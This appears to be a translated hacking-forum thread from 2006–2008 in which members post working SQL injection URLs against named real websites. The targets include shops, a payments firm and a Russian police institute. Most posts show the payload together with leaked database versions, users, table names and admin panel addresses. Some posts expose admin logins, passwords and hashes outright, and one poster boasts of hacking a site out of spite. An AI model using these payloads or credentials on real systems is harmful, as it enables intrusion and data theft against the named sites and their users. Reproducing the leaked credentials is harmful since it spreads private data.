SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.dreptonline.ro/stiri/detaliu_stire.php?id_stire=-652+union+select+1,2,3,4,5 ,6,7/*


    version :4.1.22-standard
    user: dreptonl_dr@localhost
    database: dreptonl_dr
     
  2. Gorev

    http://www.oferta9.ro/magazin2.php?m=-1951+union+sele ct+1,2,3,4,5,6,7,8,9,0,1,2,3,4, 5/*


    version :5.0.45-community
    user : mn76_iuser@localhost
    database: mn76_iuser
     
  3. Gorev

    George Soros's site

    http://www.osf.ro/ro/program.php?program=-30+union+select+1,2, 3,4,5,6/*
    version: 4.0.18
    user: sitenou@localhost
    database: site2007
     
  4. †c0(aIn?†

    †c0(aIn?† Member

    Joined:
    4 May 2008
    Messages:
    14
    Likes Received:
    5
    Reputations:
    0
    http://www.gans-club.ru/catalogue.php?id=-1+union+select+1,2,3,5,6,7/*

    version: 5.0.24-standard
    user: gansclub1@localhost
    db: db_gansclub1

    http://www.gans-club.ru/admin/

    The admin is a sucker....muhahaha

    P.S.: When I saw how much their cigarettes cost, I decided right away: gotta hack it)))
     
    #5424 †c0(aIn?†, 13 May 2008
    Last edited: 13 May 2008
  5. neon_fx

    neon_fx Elder

    Joined:
    22 Feb 2008
    Messages:
    74
    Likes Received:
    32
    Reputations:
    0
    http://www.atur.com.ua/index.php?id=-903+union+select+1,2,3,4,5,6+from+users/*

    atur@localhost
    4.1.22
    atur
     
  6. Grema

    Grema Elder

    Joined:
    29 Nov 2005
    Messages:
    109
    Likes Received:
    16
    Reputations:
    -4
    Some kind of game) Traffic is 0.
    Code:
    http://g1.rezni.net/forum/post.php?a=new_post&forum=-1+UNION+SELECT+null,concat(login,':',pass),null,null+From+users+limit+0,1/*
    rezninet_sred@localhost
    4.1.21
    rezninet_game
    
     
    1 person likes this.
  7. neon_fx

    Online game
    World of Gladiators

    http://sotovikmar.nov.ru/forum/post.php?a=new_post&forum=-1+union+select+1,concat_ws(char(58),name,pass),3,4+from+users+limit+1+offset+2/*

    kaskara_sotm@localhost
    4.1.21-standard
    kaskara_sotm
     
    #5427 neon_fx, 14 May 2008
    Last edited: 14 May 2008
  8. S00pY

    S00pY Active Member

    Joined:
    24 Apr 2007
    Messages:
    91
    Likes Received:
    109
    Reputations:
    21
    http://www.agarev.com/website.php?id=-1+union+select+1,lgn,pswd,4+from+agrv_user/*
    Output is at the very bottom, under the banners!
     
  9. Vid0k

    Vid0k Elder

    Joined:
    24 Dec 2007
    Messages:
    393
    Likes Received:
    125
    Reputations:
    13
    E-Shop

    One is almost fully worked through, the rest are not; I just ran out of time and decided to post them so they don't sit idle.
    So, here we go:
    http://www.quicktech.com.tw/eshop_en/class_b.asp?ID=47'
    =
    [Microsoft][ODBC SQL Server Driver][SQL Server]? nvarchar ?? 'Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Personal Edition on Windows NT 5.2 (Build 3790: Service Pack 2) '
    =
    DB - 'DataSQL_eshop_EN'
    Tables and columns:
    Not worked through. Note: some of them log MySQL errors; only go in through a proxy:
     
  10. LUKAC

    LUKAC Banned

    Joined:
    19 Aug 2007
    Messages:
    0
    Likes Received:
    6
    Reputations:
    0
    Here's a pack -)

    I'll add more later

    http://www.ukrbiznes.com/website.php?id=66551+union+select+version(),2,3,4,5,6,7,8,9,0,1,2/* - for anyone who can be bothered to bypass the filtering... 12 tables ... !
    http://www.ukrnic.com/hosting_info.php?id=2+union+select+1,2,version()/*

    ===============================================================================================================
    http://www.zcasher.info/products.php?id=4'+union+select+1,2,3,table_name,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+information_schema.tables/*
    WMZ exchange office
    Tables below; I picked everything related to users

    cap_partners
    cap_users
    exch_clients
    zmc2_adminusers
    zmc2_users
    uab_partners
    ===============================================================================================================
     
    #5430 LUKAC, 15 May 2008
    Last edited: 15 May 2008
    2 people like this.
  11. lastsmile

    lastsmile Elder

    Joined:
    22 Sep 2007
    Messages:
    40
    Likes Received:
    10
    Reputations:
    0
    http://www.flipskateboards.com/news.php?id=-9999'+union+select+table_name,column_name+from+information_schema.columns+limit+264,1/*

    http://www.flipskateboards.com/admin/
    login/pass: arjan

    ----------------

    http://www.classicalsource.com/db_control/db_cd_review.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,id,password,user_name,15,16,17,18,19,20,21,22,23+from+user+limit+0,1/*

    http://www.classicalsource.com/admin/site_admin.php
    login: davef
    pass: qpd45122
     
    #5431 lastsmile, 15 May 2008
    Last edited: 15 May 2008
    1 person likes this.
  12. neon_fx

    http://www.infra-m.ru/live/news.asp?date=03.03.2008&id=471468+or+1=@@version--

    SQL Server 2005 - 9.00.3054.00 (X64) Mar 23 2007 18:41:50 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2)

    //******************************
    http://www.rkgarant.ru/news.asp?id=376+or+1=@@version--

    'Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Workgroup Edition on Windows NT 5.2 (Build 3790: Service Pack 1)

    http://www.rkgarant.ru/news.asp?id=376+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(SELECT+TOP+32+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(0x2345)))--
    users table
     
    #5432 neon_fx, 15 May 2008
    Last edited: 15 May 2008
    1 person likes this.
  13. Momiji

    Momiji Elder

    Joined:
    25 Aug 2007
    Messages:
    495
    Likes Received:
    348
    Reputations:
    127
    aiman.eu
    Code:
    http://www.aiman.eu/index.php?id=-1+union+select+1,2,3,concat_ws(0x3,version(),user(),database()),5,6,7,8,9,10/*
    
    4.0.27-max-log[email protected]db161593031
    Code:
    http://www.aiman.eu/index.php?id=-1+union+select+1,2,3,concat(login,0x3,pass),5,6,7,8,9,10+from+admin/*
    aimanff8ac4f495af20f4a7c63d4644d568b5:schmann
    Admin panel: http://www.aiman.eu/admin/
     
    2 people like this.
  14. Gorev

    http://www.atlasmonde.net/pays.php?idp=-1+union+select+1,2,3,table_name,5,6,7,8,9,0,1,2,3,4,5,6,7+from+in formation_schema.tables+limit+18,1/*


    version: 5.0.22
    user : altasmonde_user@localhost
    database : altasmonde_base
     
  15. neon_fx

    Internet trading

    http://www.netinvestor.ru/news.asp?id=851142+or+1=@@VERSION

    'Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

    Users and passwords
    http://www.netinvestor.ru/news.asp?id=851142+or+1=(SELECT+TOP+1+password+from+usertable+WHERE+password+NOT+IN+(SELECT+TOP+10+password+from+usertable+WHERE+password+NOT+IN+(0x23)))--
     
    1 person likes this.
  16. Gorev

    http://www.comeniuskft.hu/main.php?kozepre=kereskedelmi&kategoria=-7+union+select+1,2,3,table_name,5,6, 7,8+from+information_schema.tables+l imit+16,1/*
    the table we need

    http://www.comeniuskft.hu/main.php?kozepre=kereskedelmi&kategoria=-7+union+select+1,2,3,column_name,5,6,7,8+from+information_schema.columns+where+table_name=0x61646d696e/*

    0x61646d696e = admin

    http://www.comeniuskft.hu/main.php?kozepre=kereskedelmi&kategoria=-7+union+select+1,2,3,concat_ws(0x3a,nick,password),5,6,7,8+from+admin/*

    that's really all that's needed....

    oh yes, I completely forgot

    http://www.comeniuskft.hu/admin.php
     
  17. neon_fx

    http://www.win-developers.com/forum/show.asp?id=606&fid=178++or+1=@@version--

    'Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on Windows NT 5.2 (Build 3790: Service Pack 2)
     
  18. Gorev

    http://www.motorcitysuns.com/team.php?id=-1+union+sel ect+1,,2, 3,4/*


    version: 4.1.22-standard-log
    user : oaklands_1@localhost
    database : oaklands_1
     
  19. Mr. P.S.

    Mr. P.S. Elder

    Joined:
    27 May 2007
    Messages:
    179
    Likes Received:
    296
    Reputations:
    35
    fexco.com
    the global payments group

    Code:
    http://www.fexco.com/viewjob.php?id=-105+union+select+1,2,concat_ws(0x3203a20,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15/*
    version: 5.0.45-community-log
    user: [email protected]
    database: splashg_fexco

    Code:
    http://www.fexco.com/viewjob.php?id=-105+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables+limit+1,1/*
     
    #5439 Mr. P.S., 16 May 2008
    Last edited: 16 May 2008
  20. neon_fx

    ROSTOV LAW INSTITUTE OF THE MINISTRY OF INTERNAL AFFAIRS OF RUSSIA

    http://www.rui.rsd.ru/print/news.asp?newsId=5698+or+1=@@version--

    'Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

    http://www.rui.rsd.ru/print/news.asp?newsId=5698+or+1=(select%20db_name())--
    DB- rui
    User-SITE\IUSR_WEB3
     
    1 person likes this.